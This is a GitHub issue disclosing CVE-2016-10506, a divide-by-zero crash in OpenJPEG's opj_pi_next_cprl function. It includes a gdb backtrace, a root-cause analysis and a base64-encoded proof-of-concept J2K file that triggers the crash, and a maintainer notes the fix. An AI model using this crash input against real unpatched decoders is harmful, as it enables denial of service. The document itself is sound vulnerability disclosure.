Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

[CVE-2016-10506] division-by-zero (SIGFPE) error in opj_pi_next_cprl function (line 526 of pi.c) #732

Closed
trylab opened this issue Mar 28, 2016 · 1 comment
Closed

[CVE-2016-10506] division-by-zero (SIGFPE) error in opj_pi_next_cprl function (line 526 of pi.c) #732

trylab opened this issue Mar 28, 2016 · 1 comment
Labels
bug Priority-Critical
Milestone
OPJ v2.1.3

Comments

@trylab
Copy link
Contributor

trylab commented Mar 28, 2016

Testing Environment

Ubuntu + OpenJPEG (GitHub master, 2016/03/28)

Exception Information

username@ubuntu:~/Desktop/openjpeg/bin$ gdb opj_decompress -q
Reading symbols from opj_decompress...done.
(gdb) r -o image.pgm -i crashes/002.j2k
Starting program: ~/Desktop/openjpeg/bin/opj_decompress -o image.pgm -i crashes/002.j2k

Program received signal SIGFPE, Arithmetic exception.
0xb7fb8d01 in opj_pi_next_cprl (pi=0x8090ec0)
at /home/username/Desktop/openjpeg/src/lib/openjp2/pi.c:526
526 if (!((pi->x % (OPJ_INT32)(comp->dx << rpx) == 0) ||
((pi->x == pi->tx0) && ((trx0 << levelno) % (1 << rpx))))){

(gdb) p comp->dx
$1 = 2
(gdb) p rpx
$2 = 31

(gdb) bt
#0 0xb7fb8d01 in opj_pi_next_cprl (pi=0x8090ec0)

at /home/username/Desktop/openjpeg/src/lib/openjp2/pi.c:526

#1 0xb7fbc4cc in opj_pi_next (pi=0x8090ec0)

at /home/username/Desktop/openjpeg/src/lib/openjp2/pi.c:1871

#2 0xb7fc0b8d in opj_t2_decode_packets (p_t2=0x8090878, p_tile_no=0, p_tile=0x80658d0,

                                     p_src=0x80668d8 "\337\aV", p_data_read=0xbfff9dec, 
                                     p_max_len=49, p_cstr_index=0x8061d68, p_manager=0x80601e4)
at /home/username/Desktop/openjpeg/src/lib/openjp2/t2.c:412

#3 0xb7fc6368 in opj_tcd_t2_decode (p_tcd=0x8065890, p_src_data=0x80668d8 "\337\aV",

                                 p_data_read=0xbfff9dec, p_max_src_size=225, 
                                 p_cstr_index=0x8061d68, p_manager=0x80601e4) 
at /home/username/Desktop/openjpeg/src/lib/openjp2/tcd.c:1552

#4 0xb7fc5d17 in opj_tcd_decode_tile (p_tcd=0x8065890, p_src=0x80668d8 "\337\aV",

                                   p_max_length=225, p_tile_no=0, 
                                   p_cstr_index=0x8061d68, p_manager=0x80601e4) 
at /home/username/Desktop/openjpeg/src/lib/openjp2/tcd.c:1291

#5 0xb7fa832a in opj_j2k_decode_tile (p_j2k=0x8060298, p_tile_index=0,

                                   p_data=0x80664c8 "", p_data_size=128, 
                                   p_stream=0x8060170, p_manager=0x80601e4)
at /home/username/Desktop/openjpeg/src/lib/openjp2/j2k.c:8125

#6 0xb7fac369 in opj_j2k_decode_tiles (p_j2k=0x8060298, p_stream=0x8060170, p_manager=0x80601e4)

at /home/username/Desktop/openjpeg/src/lib/openjp2/j2k.c:9745

#7 0xb7fa661e in opj_j2k_exec (p_j2k=0x8060298, p_procedure_list=0x8062420,

                            p_stream=0x8060170, p_manager=0x80601e4)
at /home/username/Desktop/openjpeg/src/lib/openjp2/j2k.c:7341

#8 0xb7facaf9 in opj_j2k_decode (p_j2k=0x8060298, p_stream=0x8060170,

                              p_image=0x8065cc0, p_manager=0x80601e4)
at /home/username/Desktop/openjpeg/src/lib/openjp2/j2k.c:9943

#9 0xb7fb1aad in opj_jp2_decode (jp2=0x8060210, p_stream=0x8060170,

                              p_image=0x8065cc0, p_manager=0x80601e4)
at /home/username/Desktop/openjpeg/src/lib/openjp2/jp2.c:1487

#10 0xb7fb6c79 in opj_decode (p_codec=0x80601b8, p_stream=0x8060170, p_image=0x8065cc0)

at /home/username/Desktop/openjpeg/src/lib/openjp2/openjpeg.c:412

#11 0x0804c2c0 in main (argc=5, argv=0xbffff124)

at /home/username/Desktop/openjpeg/src/bin/jp2/opj_decompress.c:1330

Simple Analysis

The value of comp->dx is 2 and the value of rpx is 31.
The value evaluated from (OPJ_INT32)(comp->dx << rpx) is 0 (2<<31 == 0).
The code pi->x%(OPJ_INT32)(comp->dx<<rpx) will cause a divide-by-zero exception (SIGFPE).

Proof-of-Concept file

Please decode the following content with base64 algorithm.
Then you should save the decoded content to a j2k file to generate the PoC.

AAAADGpQICANCocKAAAAFGZ0eXBqcDIgAAAAAGpwMiAAAAAtanAyaAAAABZpaGRyAAAAIAAAACAA
AweHAAAAAAAPY29scgEAAAAAABAAAAFnanAyY/9P/1EALwAAAAAAAQAAACAAAAAAAAAAAIAAACAA
AAAgAAAAAAAAAAAAAwcCAQcBAYoBAf9SAAwABAABAREEBIAB/1wABEBA/2QAJQABQ3JlYXRlZCBi
eSBPcGVuSlBFRyB2ZXJzaWZ0eXAuMS4w/5AACgAAAAAA7wAB/5PfB1YANB/WzgwnT0scoB/vuZfg
c1PvCOOcZjXu94sFdFbBplUpDNQKo/J/xlMus9LPf6OB3S2g7cWVduNF1Jaz7rIDsiUuZP97i6v6
AKLEZkELDIYYc/9zmmka8yiifaZFEnVtgpHmcWvWIj909OzjqMTdl/xjGiEA30lKlsnQgHvkAAAA
DCQlU8IGCRzPVltBDquXVV1SKEgCZ6AAAL//MDWwLWWTjY66dD2zcDL4QNwgyHZAed8ygGb/NYsD
EkIdgqz2vhAr2q6hLHANUHiJLHTG3LUbzHETySr/f/9//3//2Q==

Credit

This vulnerability was discovered by Ke Liu of Tencent's Xuanwu LAB.
@trylab trylab changed the title division-by-zero (SIGFPE) error in opj_pi_next_cprl function in (line 526 of pi.c) division-by-zero (SIGFPE) error in opj_pi_next_cprl function (line 526 of pi.c) Mar 28, 2016
@malaterre malaterre added this to the OPJ v2.1.2 milestone Sep 20, 2016
@trylab trylab mentioned this issue Sep 21, 2016
Closed
@detonin detonin modified the milestones: OPJ v2.1.2, OPJ v2.1.3 Sep 29, 2016
@rouault
Copy link
Collaborator

rouault commented Jul 26, 2017

Fixed per d27ccf0

@rouault rouault closed this as completed Jul 26, 2017
@trylab trylab changed the title division-by-zero (SIGFPE) error in opj_pi_next_cprl function (line 526 of pi.c) [CVE-2016-10506] division-by-zero (SIGFPE) error in opj_pi_next_cprl function (line 526 of pi.c) Aug 30, 2017
@YangY-Xiao YangY-Xiao mentioned this issue Jul 17, 2018
Closed
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
bug Priority-Critical
Projects
None yet
Milestone
OPJ v2.1.3
Development

No branches or pull requests
5 participants
@malaterre @detonin @rouault @mayeut @trylab